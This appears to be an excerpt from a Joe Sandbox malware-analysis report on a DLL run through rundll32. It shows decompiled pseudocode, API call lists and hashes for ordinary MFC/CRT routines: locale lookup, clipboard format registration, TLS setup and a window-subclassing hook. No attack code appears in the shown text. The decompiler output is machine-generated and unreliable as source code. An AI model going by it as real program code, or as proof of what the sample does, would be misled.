                                                                                                                                    0x10014e7a
                                                                                                                                    0x10014e7a
                                                                                                                                    0x10014e81
                                                                                                                                    0x10014e81
                                                                                                                                    0x10014e86
                                                                                                                                    0x10014e89
                                                                                                                                    0x10014ea0
                                                                                                                                    0x10014ea7
                                                                                                                                    0x10014eb6
                                                                                                                                    0x10014fec
                                                                                                                                    0x10014ff3
                                                                                                                                    0x10015003
                                                                                                                                    0x10015006
                                                                                                                                    0x10015009
                                                                                                                                    0x10015010
                                                                                                                                    0x10015013
                                                                                                                                    0x1001501a
                                                                                                                                    0x10015026
                                                                                                                                    0x10015030
                                                                                                                                    0x10015035
                                                                                                                                    0x10015035
                                                                                                                                    0x1001503a
                                                                                                                                    0x1001503f
                                                                                                                                    0x1001505c
                                                                                                                                    0x1001505c
                                                                                                                                    0x10015063
                                                                                                                                    0x10015068
                                                                                                                                    0x00000000
                                                                                                                                    0x10015041
                                                                                                                                    0x10015041
                                                                                                                                    0x10015048
                                                                                                                                    0x10015050
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10015052
                                                                                                                                    0x10015056
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10015058
                                                                                                                                    0x1001505a
                                                                                                                                    0x00000000
                                                                                                                                    0x1001505a
                                                                                                                                    0x10014ebc
                                                                                                                                    0x10014ebc
                                                                                                                                    0x1001506a
                                                                                                                                    0x1001506d
                                                                                                                                    0x10015075
                                                                                                                                    0x10015076
                                                                                                                                    0x10015077
                                                                                                                                    0x1001508c
                                                                                                                                    0x1001508c

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                    • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                    • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                                    • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014F68
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                                    • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                                    • ConvertDefaultLocale.KERNEL32(7322FFF6), ref: 10014FD9
                                                                                                                                    • _memset.LIBCMT ref: 10014FF3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                    • API String ID: 434808117-483790700
                                                                                                                                    • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                    • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                                    • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                    • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E1002E129(intOrPtr* __ecx) {
                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                    
                                                                                                                                    				_t27 = __ecx;
                                                                                                                                    				 *_t27 = RegisterClipboardFormatA("Native");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                                                                                                    				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                                                                                                    				return _t27;
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                                    • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                                    • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                                    • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                                    • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                                    • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                                    • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                                    • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                                    • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                                    • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                                    • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                                    • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                    • API String ID: 1228543026-2889995556
                                                                                                                                    • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                    • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                                    • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                    • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E1003548E(void* __ebx, void* __edx) {
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				_Unknown_base(*)()* _t7;
                                                                                                                                    				long _t10;
                                                                                                                                    				void* _t11;
                                                                                                                                    				int _t12;
                                                                                                                                    				void* _t18;
                                                                                                                                    				intOrPtr _t21;
                                                                                                                                    				long _t26;
                                                                                                                                    				void* _t30;
                                                                                                                                    				void* _t37;
                                                                                                                                    				struct HINSTANCE__* _t38;
                                                                                                                                    				void* _t41;
                                                                                                                                    				void* _t43;
                                                                                                                                    
                                                                                                                                    				_t37 = __edx;
                                                                                                                                    				_t30 = __ebx;
                                                                                                                                    				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                    					 *0x10057934 = GetProcAddress(_t38, "FlsAlloc");
                                                                                                                                    					 *0x10057938 = GetProcAddress(_t38, "FlsGetValue");
                                                                                                                                    					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
                                                                                                                                    					_t7 = GetProcAddress(_t38, "FlsFree");
                                                                                                                                    					__eflags =  *0x10057934;
                                                                                                                                    					_t41 = TlsSetValue;
                                                                                                                                    					 *0x10057940 = _t7;
                                                                                                                                    					if( *0x10057934 == 0) {
                                                                                                                                    						L6:
                                                                                                                                    						 *0x10057938 = TlsGetValue;
                                                                                                                                    						 *0x10057934 = E10035111;
                                                                                                                                    						 *0x1005793c = _t41;
                                                                                                                                    						 *0x10057940 = TlsFree;
                                                                                                                                    					} else {
                                                                                                                                    						__eflags =  *0x10057938;
                                                                                                                                    						if( *0x10057938 == 0) {
                                                                                                                                    							goto L6;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags =  *0x1005793c;
                                                                                                                                    							if( *0x1005793c == 0) {
                                                                                                                                    								goto L6;
                                                                                                                                    							} else {
                                                                                                                                    								__eflags = _t7;
                                                                                                                                    								if(_t7 == 0) {
                                                                                                                                    									goto L6;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t10 = TlsAlloc();
                                                                                                                                    					__eflags = _t10 - 0xffffffff;
                                                                                                                                    					 *0x100547c8 = _t10;
                                                                                                                                    					if(_t10 == 0xffffffff) {
                                                                                                                                    						L15:
                                                                                                                                    						_t11 = 0;
                                                                                                                                    						__eflags = 0;
                                                                                                                                    					} else {
                                                                                                                                    						_t12 = TlsSetValue(_t10,  *0x10057938);
                                                                                                                                    						__eflags = _t12;
                                                                                                                                    						if(_t12 == 0) {
                                                                                                                                    							goto L15;
                                                                                                                                    						} else {
                                                                                                                                    							E100310CD();
                                                                                                                                    							 *0x10057934 = E10035042( *0x10057934);
                                                                                                                                    							 *0x10057938 = E10035042( *0x10057938);
                                                                                                                                    							 *0x1005793c = E10035042( *0x1005793c);
                                                                                                                                    							 *0x10057940 = E10035042( *0x10057940);
                                                                                                                                    							_t18 = E10035923();
                                                                                                                                    							__eflags = _t18;
                                                                                                                                    							if(_t18 == 0) {
                                                                                                                                    								L14:
                                                                                                                                    								E10035178(_t37);
                                                                                                                                    								goto L15;
                                                                                                                                    							} else {
                                                                                                                                    								_push(E10035304);
                                                                                                                                    								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
                                                                                                                                    								__eflags = _t21 - 0xffffffff;
                                                                                                                                    								 *0x100547c4 = _t21;
                                                                                                                                    								if(_t21 == 0xffffffff) {
                                                                                                                                    									goto L14;
                                                                                                                                    								} else {
                                                                                                                                    									_t43 = E10035840(1, 0x214);
                                                                                                                                    									__eflags = _t43;
                                                                                                                                    									if(_t43 == 0) {
                                                                                                                                    										goto L14;
                                                                                                                                    									} else {
                                                                                                                                    										_push(_t43);
                                                                                                                                    										_push( *0x100547c4);
                                                                                                                                    										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                    											goto L14;
                                                                                                                                    										} else {
                                                                                                                                    											_push(0);
                                                                                                                                    											_push(_t43);
                                                                                                                                    											E100351B5(_t30, _t37, _t38, _t43, __eflags);
                                                                                                                                    											_t26 = GetCurrentThreadId();
                                                                                                                                    											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                                                                                    											 *_t43 = _t26;
                                                                                                                                    											_t11 = 1;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t11;
                                                                                                                                    				} else {
                                                                                                                                    					E10035178(_t37);
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    			}


















                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                                    • __mtterm.LIBCMT ref: 100354A0
                                                                                                                                      • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                                      • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                                      • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                                    • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                                    • __init_pointers.LIBCMT ref: 10035552
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                                    • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                                    • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                                    • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                                    • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                    • API String ID: 4287529916-3819984048
                                                                                                                                    • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                    • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                                    • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                    • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                    				intOrPtr _t54;
                                                                                                                                    				void* _t55;
                                                                                                                                    				signed int _t56;
                                                                                                                                    				void* _t59;
                                                                                                                                    				long _t60;
                                                                                                                                    				signed int _t64;
                                                                                                                                    				void* _t66;
                                                                                                                                    				short _t72;
                                                                                                                                    				signed int _t74;
                                                                                                                                    				signed int _t76;
                                                                                                                                    				long _t83;
                                                                                                                                    				signed int _t86;
                                                                                                                                    				signed short _t87;
                                                                                                                                    				signed int _t88;
                                                                                                                                    				int _t94;
                                                                                                                                    				void* _t107;
                                                                                                                                    				long* _t109;
                                                                                                                                    				long _t111;
                                                                                                                                    				signed int _t112;
                                                                                                                                    				CHAR* _t113;
                                                                                                                                    				intOrPtr _t114;
                                                                                                                                    				void* _t117;
                                                                                                                                    				void* _t120;
                                                                                                                                    				intOrPtr _t121;
                                                                                                                                    
                                                                                                                                    				_t120 = __eflags;
                                                                                                                                    				_t106 = __edi;
                                                                                                                                    				_push(0x148);
                                                                                                                                    				E10030D90(E1004429C, __ebx, __edi, __esi);
                                                                                                                                    				_t111 =  *(_t117 + 0x10);
                                                                                                                                    				_t94 =  *(_t117 + 0xc);
                                                                                                                                    				_push(E10015B30);
                                                                                                                                    				 *(_t117 - 0x120) = _t111;
                                                                                                                                    				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
                                                                                                                                    				_t121 = _t54;
                                                                                                                                    				_t97 = 0 | _t121 == 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
                                                                                                                                    				if(_t121 == 0) {
                                                                                                                                    					_t54 = E100201F1(_t97);
                                                                                                                                    				}
                                                                                                                                    				if( *(_t117 + 8) == 3) {
                                                                                                                                    					_t107 =  *_t111;
                                                                                                                                    					_t112 =  *(_t54 + 0x14);
                                                                                                                                    					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
                                                                                                                                    					__eflags = _t112;
                                                                                                                                    					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                                    					 *(_t117 - 0x124) = _t56;
                                                                                                                                    					if(_t112 != 0) {
                                                                                                                                    						L7:
                                                                                                                                    						__eflags =  *0x10057854;
                                                                                                                                    						if( *0x10057854 == 0) {
                                                                                                                                    							L12:
                                                                                                                                    							__eflags = _t112;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								__eflags =  *0x10057454;
                                                                                                                                    								if( *0x10057454 != 0) {
                                                                                                                                    									L19:
                                                                                                                                    									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										L23:
                                                                                                                                    										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                                    										__eflags = _t59;
                                                                                                                                    										 *(_t117 - 0x14) = _t59;
                                                                                                                                    										if(_t59 != 0) {
                                                                                                                                    											_t113 = "AfxOldWndProc423";
                                                                                                                                    											_t64 = GetPropA(_t94, _t113);
                                                                                                                                    											__eflags = _t64;
                                                                                                                                    											if(_t64 == 0) {
                                                                                                                                    												SetPropA(_t94, _t113,  *(_t117 - 0x14));
                                                                                                                                    												_t66 = GetPropA(_t94, _t113);
                                                                                                                                    												__eflags = _t66 -  *(_t117 - 0x14);
                                                                                                                                    												if(_t66 ==  *(_t117 - 0x14)) {
                                                                                                                                    													GlobalAddAtomA(_t113);
                                                                                                                                    													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										L27:
                                                                                                                                    										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
                                                                                                                                    										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
                                                                                                                                    										__eflags =  *(_t117 - 0x124);
                                                                                                                                    										_t111 = _t60;
                                                                                                                                    										if( *(_t117 - 0x124) != 0) {
                                                                                                                                    											UnhookWindowsHookEx( *(_t106 + 0x28));
                                                                                                                                    											_t50 = _t106 + 0x28;
                                                                                                                                    											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
                                                                                                                                    											__eflags =  *_t50;
                                                                                                                                    										}
                                                                                                                                    										goto L30;
                                                                                                                                    									}
                                                                                                                                    									goto L27;
                                                                                                                                    								}
                                                                                                                                    								_t114 = 0x30;
                                                                                                                                    								E10030030(_t107, _t117 - 0x154, 0, _t114);
                                                                                                                                    								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
                                                                                                                                    								_push(_t117 - 0x154);
                                                                                                                                    								_push("#32768");
                                                                                                                                    								_push(0);
                                                                                                                                    								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
                                                                                                                                    								__eflags = _t72;
                                                                                                                                    								 *0x10057454 = _t72;
                                                                                                                                    								if(_t72 == 0) {
                                                                                                                                    									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
                                                                                                                                    									__eflags = _t74;
                                                                                                                                    									if(_t74 == 0) {
                                                                                                                                    										goto L23;
                                                                                                                                    									}
                                                                                                                                    									 *((char*)(_t117 - 0x19)) = 0;
                                                                                                                                    									_t76 = E10032D2F(_t117 - 0x118, "#32768");
                                                                                                                                    									__eflags = _t76;
                                                                                                                                    									if(_t76 == 0) {
                                                                                                                                    										goto L27;
                                                                                                                                    									}
                                                                                                                                    									goto L23;
                                                                                                                                    								}
                                                                                                                                    								goto L19;
                                                                                                                                    							}
                                                                                                                                    							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
                                                                                                                                    							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                                                                                                    							E1001B083(_t112, _t117, _t94);
                                                                                                                                    							 *((intOrPtr*)( *_t112 + 0x50))();
                                                                                                                                    							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
                                                                                                                                    							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
                                                                                                                                    							__eflags = _t83 - E1001B780;
                                                                                                                                    							if(_t83 != E1001B780) {
                                                                                                                                    								 *_t109 = _t83;
                                                                                                                                    							}
                                                                                                                                    							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                                    							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
                                                                                                                                    							__eflags =  *(_t117 - 0x14);
                                                                                                                                    							if( *(_t117 - 0x14) != 0) {
                                                                                                                                    								_push( *(_t117 - 0x18));
                                                                                                                                    								_push(0);
                                                                                                                                    								E1001F30C();
                                                                                                                                    							}
                                                                                                                                    							goto L27;
                                                                                                                                    						}
                                                                                                                                    						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                                    						__eflags = _t86 & 0x00010000;
                                                                                                                                    						if((_t86 & 0x00010000) != 0) {
                                                                                                                                    							goto L27;
                                                                                                                                    						}
                                                                                                                                    						_t87 =  *(_t107 + 0x28);
                                                                                                                                    						__eflags = _t87 - 0xffff;
                                                                                                                                    						if(_t87 <= 0xffff) {
                                                                                                                                    							 *(_t117 - 0x18) = 0;
                                                                                                                                    							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
                                                                                                                                    							_t87 = _t117 - 0x18;
                                                                                                                                    						}
                                                                                                                                    						_t88 = E10014B55(_t87, "ime");
                                                                                                                                    						__eflags = _t88;
                                                                                                                                    						if(_t88 == 0) {
                                                                                                                                    							goto L27;
                                                                                                                                    						}
                                                                                                                                    						goto L12;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *(_t107 + 0x20) & 0x40000000;
                                                                                                                                    					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
                                                                                                                                    						goto L27;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t56;
                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                    						goto L27;
                                                                                                                                    					}
                                                                                                                                    					goto L7;
                                                                                                                                    				} else {
                                                                                                                                    					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
                                                                                                                                    					L30:
                                                                                                                                    					return E10030E13(_t94, _t106, _t111);
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                                      • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                                    • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                                    • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                                    • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                                    • _memset.LIBCMT ref: 1001CA70
                                                                                                                                    • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                                    • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                                    • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                                    • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                                    • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                                    • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
